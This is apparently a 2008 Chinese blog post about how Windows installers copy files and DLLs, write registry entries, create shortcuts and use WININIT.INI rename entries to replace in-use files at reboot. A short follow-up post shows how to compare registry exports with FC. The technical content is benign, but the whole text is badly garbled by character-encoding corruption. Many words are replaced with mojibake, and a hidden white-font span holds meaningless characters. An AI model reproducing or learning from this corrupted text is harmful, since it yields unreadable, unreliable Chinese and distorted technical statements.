2)�q�一步，可以说至��有一半��Y件在安装旉��会做�Q�一些��Y�Ӟ��需要用到某个DLL�Q�特别是那些软�g作者开发的DLL�Q�或者系�l�中不常用的DLL�Q�一般都会随软�g的安装拷到系�l�目录。所谓系�l�目录，在WIN98下一般是在WINDOWS\SYSTEM�q�个目录�Q�而WIN2K是在WINNT\SYSTEM32�Q�WINXP是在WINDOWS\SYSTEM32。还有，一些��Y件如QQ游戏�Q�中游等�Q�它们也用到一些DLL�Q�由于这些DLL只是�q�个软�g自己用到�Q�别的其他��Y件不会用刎ͼ�所以它们�ƈ不一定存在于�pȝ��目录�Q�而是攑֜�软�g安装目录里面�Q�这��L��DLL已经在上一步中被拷贝，所以和�q�一步说的情况不一栗��?/p>
3)�q�一步同栯��有一半��Y件会做，一般在安装前用��L��讄��和一些选项�Q�在安装时就会把�q�些讄��写到注册表里。另外就是有时在上一步把DLL拯��到系�l�目录时�Q�一些DLL需要向�pȝ��注册�Q�这些DLL的注册信息也会写在注册表里。还有，一些��Y件有时可能安装时�q�不写注册表�Q�而是在第一�ơ运行时才把一些设�|�写到注册表�?/p>
4)�q�个非常��单，大概不需要怎么解释。徏立这些快��h��式一斚w��是便于用��h��行，另外在时也会把卸载的快捷方式攑֜��E�序�l�里。关于卸载后面我们再来讨论�?/p>
5)�q�个��是除了上面说的以外的其他情��c��例如有些��Y件安装时会先把所有文�?或一部分文�g)先解压到临时目录�Q�那么安装完之后��p��把这些文件删除掉�?/p>
    那么我们再�ȝ��一下：

一、一个典型的软�g在安装过�E�一般都会执行上面的1-4��V��这样可以认为是一个完整的安装�q�程�?/p>
二、除了第1��之外，其他的都不是必要的。只需要第一��的软�g�Q�我们可以把它叫做绿色��Y件�?/p>
三、有些��Y件安装时是执行了1�?�?�Q�有些��Y件是执行�?�?�?�Q�有些��Y件是执行�?�?�?/p>
四、一个特�D�的情况�Q�一般的驱动�E�序�Q�只会执�?�?�Q�没�?�?�?/p>
五、理��Z��Q��Q何��Y�Ӟ��如果你非常确切地知道了它在上面的那几步都具体做了些什么，特别�?�?�Q�那么，理论上你可以把这个��Y件的安装文�g拯��到另一台机子，把必要的DLL从系�l�目录拷贝到那一台机子的�pȝ��目录�Q�再把注册表里��Y件写入的��目导出�?必要时还要修改一�?再导入到那台机子的注册表中，那么�Q�就��不是绿色��Y�Ӟ��你也能这��h��它移植给另一台机。但有时特别是一些共享��Y�Ӟ��一般都会有注册表中讄��比较隐蔽的项目，不容易查找，所以除非你对系�l�非常熟悉，否则不是�l�色软�g的��Y件要�U�L��q�是有一定的隑ֺ�的�?/p>
     那么�Q�下面我们再来看看，��Z��么一些��Y件安装后要重启�?/p>
在WINDOWS操作�pȝ��上，一般一个正在运行中的程序，操作�pȝ��是不让你修改它的�Q�修改包括替换，改动和删除。那么有�Ӟ��一些��Y仉��要向�pȝ��目录中写入一个DLL�Q�而系�l�目录中原来已经有同名的DLL�q�且�q�个DLL目前正在被系�l��用，因此不能用新版本��L��换它�Q�这个时候就需要重启，在重启的�q�程中，在这个DLL旧的版本被��用之前用新版本替换它。这��是��Z��么要重启的原因�?/p>
你能看到�q�里�Q�说明你很有耐心�Q��ƈ且对技术的探讨很有兴趣�Q�那么我��再说得更详�l�些。在WIN98中，上面说的�q�个替换是由�pȝ��的一个工��h��实现的，�q�个工具叫WININIT.EXE。安装程序在��到需要写入的DLL或其他程序文件正在��用时�Q�会把要写入的DLL文�g先定一个��时的文�g名，然后在WINDOWS目录中往WININIT.INI写入一个改写项�Q�比如，一个叫ABCD.DLL的动态连接库现在正在使用中，而安装程序要往�pȝ��中写入新版本的ABCD.DLL�Q�这时安装程序会把新版本ABCD.DLL先定一个��时文件名�Q�例如AAAA.LLL�Q�然后在WININIT.INI中的[rename]一节中写入�q�一��： �P늯�l�|�枓�?
C:\windows\system\abcd.dll=C:\windows\system\aaaa.lll CX�?B)
�q�样�Q�在重启�Ӟ��q�入WINDOWS囑�Ş界面之前�Q�WININIT.EXE在检��到WINDOWS目录中有WININIT.INI存在�Ӟ��执行里面的操作�Q�在上面的例子中�Q�是用C:\windows\system\aaaa.lll��L��换掉C:\windows\system\abcd.dll�q�个文�g�Q��ƈ且把WININIT.INI改名为WININIT.BAK�?/p>
     另外�Q�有些��Y�Ӟ��在安装时�Q�是把所有文件包括SETUP.EXE解压��C��时文仉��面再执行SETUP.EXE�q�行安装的，按理来说安装完要把所有的临时文�g删除掉，�q�个操作当然也是由安装程序SETUP.EXE来完成，但它自己正在�q�行�Q�也删不了它自己�Q�所以也要重启来删除�Q�做法和上面差不多，只是�Ҏ��c�M��q�样子的�Q?font color="#ffffff"> 怦S?vH�?
NUL=C:\WINDOWS\TEMP\SETUP.EXE

    在WIN2K和WINXP中，存在�c�M��的机�Ӟ��不过�q�不是用WININIT.EXE和WININIT.INI来实玎ͼ�具体的做法我也不是很清楚�Q�长期以来我大多数时候都是在用WIN98�Q�所以没认真研究�q�，但��Y件安装过�E�要重启的现象在2K和XP上是仍然存在的，原理也是在重启时替换或修�Ҏ��在��用的文�g�Q�只是实现的方式不同�?/p>
    最后，我们再来看看有关卸蝲斚w��的内宏V��一般卸载有好几�U�方式：

1)早期的安装程序，一般会在安装过�E�记录了上面说的安装�q�程�?234四个步骤中具体拷贝的文�g和DLL以及注册表项�Q�把它保存在INSTALL.LOG之类的文件中�Q�再在��Y件的安装目录(或WINDOWS目录�?放一个UNINST.EXE之类的卸载程序。然后要么在�E�序�l�里��个UNINST.EXE��Z��个快��h��式，要么在注册表中�ؓ�q�个UNINST.EXE��Z��个快��h��?�q�诛_��泼姘宓奶砑由境�l�蚓湍芸吚w��砑男对�?�Q��ƈ把INSTALL.LOG做�ؓ它的参数�Q�这样就实现卸蝲了�?/p>
2)现在比较多的安装�E�序是用新版的INSTALLSHIELD生成的，安装时的记录和卸载程序一般是会放在C:\Program Files\InstallShield Installation Information�q�个文�g�?隐藏�?**)里，同样也会在程序组和注册表中徏立卸载项�?/p>
    另外�Q�在卸蝲�Ӟ��也会遇到文�g(一般是DLL文�g)正在使用的情��c��所以有时卸载的时候也要重启，��是要在重启�q�程中删掉这些正在��用的DLL文�g�?/p>
    关于软�g的安装过�E�，大概��想到这里，以后再有惛_��什么的�Q�我再补充，大家有什么看不懂的也可以把问题提出来�?/p>

九宝 2008-05-05 15:04 发表评论

九宝 — Mon, 05 May 2008 07:00:00 GMT

    安装�?a class="UBBWordLink" target="_blank">软�g前，打开注册表编辑器�Q�选择“注册�?#8594;导出注册表文�?#8221;�Q�利�?#8220;全部”选项�Q�将�l�果文�g保存为Before.txt�Q�不要��用REG扩展名）。安装新软�g或进行用��h��跟踪的其他�Q何更改后�Q�打开注册表编辑器�Q�再导出整个注册表，�q�一�ơ将导出的文件命名�ؓAfter.txt文�g。接着打开MS-DOS命��o�H�口�Q��{换到有那两个文本文�g的目录中�Q�然后执行以下命令：

    FC Before.txt After.txt > Diff.txt

    关闭DOS�H�口�Q�在“��C��?#8221;中打开Diff.txt文�g�Q�这里会昄��在注册表所发现的所有不同之处�?br />

九宝 2008-05-05 15:00 发表评论